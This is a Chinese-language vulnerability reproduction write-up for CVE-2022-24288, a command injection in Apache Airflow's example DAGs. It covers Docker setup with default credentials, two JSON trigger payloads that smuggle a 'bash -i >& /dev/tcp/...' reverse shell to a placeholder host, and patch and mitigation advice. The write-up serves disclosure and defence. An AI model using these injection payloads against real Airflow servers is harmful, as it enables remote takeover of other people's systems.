前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2022-24288:Apache Airflow OS命令注入漏洞

CVE-2022-24288:Apache Airflow OS命令注入漏洞

作者头像
C4rpeDime
发布2022-09-13 10:16:37
1.8K1
发布2022-09-13 10:16:37
举报
文章被收录于专栏:黑白安全黑白安全

0x01 简介Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。0x02 漏洞概述Apache Airflow 存在操作系统命令注入漏洞,该漏洞的存在是由于某些示例dag中不正确的输入验证。远程未经身份验证的攻击者可利用该漏洞可以传递专门制作的HTTP请求,并在目标

0x01 简介

Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。

0x02 漏洞概述

Apache Airflow  存在操作系统命令注入漏洞,该漏洞的存在是由于某些示例dag中不正确的输入验证。远程未经身份验证的攻击者可利用该漏洞可以传递专门制作的HTTP请求,并在目标系统上执行任意操作系统命令。该漏洞允许远程攻击者可利用该漏洞在目标系统上执行任意shell命令。

0x03 影响版本

Apache Airflow < 2.2.4

0x04 环境搭建

使用docker搭建存在漏洞的系统版本

获取yaml文档

代码语言:javascript
复制
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.2.3/docker-compose.yaml'

vim docker-compose.yaml

把这两个参数改成下面的,选择postgres的latest版本,privileged=true就是提升权限

image: postgres:latest

privileged: true(没有就加一个)

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第1张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第1张

然后wq保存

在这里你用docker-compose config -q会有一个警告的,为了不报这个警告官网也推荐了以下这个方式

代码语言:javascript
复制
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env

直接执行即可

初始化

docker-compose up airflow-init

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第2张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第2张

docker-compose后台启动airflow

代码语言:javascript
复制
docker-compose -f docker-compose.yaml up -d

启动完成,浏览器打开ip:8080端口

用户名:airflow

密码:airflow

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第3张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第3张

登陆,环境搭建完成

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第4张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第4张

0x05 漏洞复现

参考漏洞提交者的文章

https://hackerone.com/reports/1492896

两处RCE均为后台漏洞(需要配合未授权或者默认口令漏洞进行利用)

第一处:

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第5张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第5张

开启监听

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第6张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第6张

反弹shell

代码语言:javascript
复制
{"foo":"\";bash -i >& /dev/tcp/xx.xx.xx.xx/8881 0>&1;\""}
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第7张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第7张

反弹成功

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第8张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第8张

第二处:

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第9张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第9张

开启监听

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第10张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第10张
代码语言:javascript
复制
{"my_param":"\";bash -i >& /dev/tcp/xx.xx.xx.xx/8881 0>&1;\""}
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第11张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第11张

反弹成功

CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析  第12张
CVE 2022 24288:Apache Airflow OS命令注入漏洞 漏洞复现 CVE 2022 24288 漏洞分析 第12张

0x06 修复方式

1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

http://seclists.org/oss-sec/2022/q1/160

2、删除或禁用默认DAG(可自行删除或在配置文件中禁用默认DAGload_examples=False)

原文由:Timeline Sec

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
容器镜像服务
容器镜像服务(Tencent Container Registry,TCR)为您提供安全独享、高性能的容器镜像托管分发服务。您可同时在全球多个地域创建独享实例,以实现容器镜像的就近拉取,降低拉取时间,节约带宽成本。TCR 提供细颗粒度的权限管理及访问控制,保障您的数据安全。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档